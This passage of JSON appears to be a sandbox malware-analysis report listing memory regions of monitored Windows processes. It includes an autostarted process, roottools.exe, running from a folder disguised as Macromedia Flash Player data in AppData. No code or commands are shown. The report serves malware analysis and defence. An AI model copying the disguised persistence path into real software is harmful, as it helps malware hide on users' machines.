"end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_2251", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:03:35.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 10813440, "type": "region", "version": 1 }, "end_va": 14954495, "entry_point": 0, "filename": null, "id": "region_2252", "name": "pagefile_0x0000000000a50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10813440, "timestamp": "00:03:35.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972174848, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2253", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:03:35.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963720704, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2254", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:03:35.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1975844864, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_2255", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:03:35.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963786240, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2256", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:03:35.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1961558016, "type": "region", "version": 1 }, "end_va": 1961578495, "entry_point": 1961558016, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_2257", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1961558016, "timestamp": "00:03:35.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2258", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:03:35.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1967411199, "entry_point": 1966407680, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_2259", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:03:35.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1992556544, "type": "region", "version": 1 }, "end_va": 1993826303, "entry_point": 1992556544, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_2260", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1992556544, "timestamp": "00:03:35.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991639040, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2261", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:03:35.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1961623552, "type": "region", "version": 1 }, "end_va": 1963700223, "entry_point": 1961623552, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_2262", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1961623552, "timestamp": "00:03:35.427", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1955463168, "type": "region", "version": 1 }, "end_va": 1955495935, "entry_point": 1955463168, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2263", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1955463168, "timestamp": "00:03:35.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2555904, "start_va": 37683200, "type": "region", "version": 1 }, "end_va": 40239103, "entry_point": 0, "filename": null, "id": "region_2264", "name": "private_0x00000000023f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37683200, "timestamp": "00:03:35.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1955332096, "type": "region", "version": 1 }, "end_va": 1955422207, "entry_point": 1955332096, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2265", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1955332096, "timestamp": "00:03:35.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1425407, "entry_point": 1179648, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2266", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:03:35.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955069952, "type": "region", "version": 1 }, "end_va": 1955311615, "entry_point": 1955069952, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2271", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955069952, "timestamp": "00:03:35.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 43184127, "entry_point": 40239104, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2272", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 40239104, "timestamp": "00:03:35.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_2273", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:03:35.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 6881279, "entry_point": 0, "filename": null, "id": "region_2274", "name": "private_0x0000000000650000", "norm_filename": null, "region_type": "private_memory", "start_va": 6619136, "timestamp": "00:03:35.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2275", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:03:35.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_2464", "name": "private_0x0000000000120000", "norm_filename": null, "region_type": "private_memory", "start_va": 1179648, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_2465", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_2466", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_2467", "name": "private_0x0000000000480000", "norm_filename": null, "region_type": "private_memory", "start_va": 4718592, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 7274495, "entry_point": 0, "filename": null, "id": "region_2468", "name": "private_0x00000000006b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7012352, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 15204352, "type": "region", "version": 1 }, "end_va": 15466495, "entry_point": 0, "filename": null, "id": "region_2469", "name": "private_0x0000000000e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 15204352, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 15597568, "type": "region", "version": 1 }, "end_va": 15859711, "entry_point": 0, "filename": null, "id": "region_2470", "name": "private_0x0000000000ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 15597568, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 15990784, "type": "region", "version": 1 }, "end_va": 16252927, "entry_point": 0, "filename": null, "id": "region_2471", "name": "private_0x0000000000f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 15990784, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 16384000, "type": "region", "version": 1 }, "end_va": 16646143, "entry_point": 0, "filename": null, "id": "region_2472", "name": "private_0x0000000000fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 16384000, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37748736, "type": "region", "version": 1 }, "end_va": 38010879, "entry_point": 0, "filename": null, "id": "region_2473", "name": "private_0x0000000002400000", "norm_filename": null, "region_type": "private_memory", "start_va": 37748736, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38010880, "type": "region", "version": 1 }, "end_va": 38273023, "entry_point": 0, "filename": null, "id": "region_2474", "name": "private_0x0000000002440000", "norm_filename": null, "region_type": "private_memory", "start_va": 38010880, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38338560, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_2475", "name": "private_0x0000000002490000", "norm_filename": null, "region_type": "private_memory", "start_va": 38338560, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 39714816, "type": "region", "version": 1 }, "end_va": 40239103, "entry_point": 0, "filename": null, "id": "region_2476", "name": "private_0x00000000025e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39714816, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_2477", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_2478", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_2479", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_2480", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2481", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2482", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 57344, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1499135, "entry_point": 0, "filename": null, "id": "region_2483", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:03:38.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1495039, "entry_point": 0, "filename": null, "id": "region_2559", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:03:57.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_2570", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:04:07.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38993920, "type": "region", "version": 1 }, "end_va": 39256063, "entry_point": 0, "filename": null, "id": "region_2571", "name": "private_0x0000000002530000", "norm_filename": null, "region_type": "private_memory", "start_va": 38993920, "timestamp": "00:04:07.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 39583743, "entry_point": 0, "filename": null, "id": "region_2572", "name": "private_0x0000000002580000", "norm_filename": null, "region_type": "private_memory", "start_va": 39321600, "timestamp": "00:04:07.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43188224, "type": "region", "version": 1 }, "end_va": 43450367, "entry_point": 0, "filename": null, "id": "region_2573", "name": "private_0x0000000002930000", "norm_filename": null, "region_type": "private_memory", "start_va": 43188224, "timestamp": "00:04:07.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130292736, "type": "region", "version": 1 }, "end_va": 2130305023, "entry_point": 0, "filename": null, "id": "region_2574", "name": "private_0x000000007ef9b000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130292736, "timestamp": "00:04:07.533", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\" ", "filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "id": "proc_15", "image_name": "roottools.exe", "monitor_reason": "autostart", "monitored_id": 15, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2578", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2579", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2580", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_2581", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_2582", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_2583", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4403199, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "id": "region_2584", "name": "roottools.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2585", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2586", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2587", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2588", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2589", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2590", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2591", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2592", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, 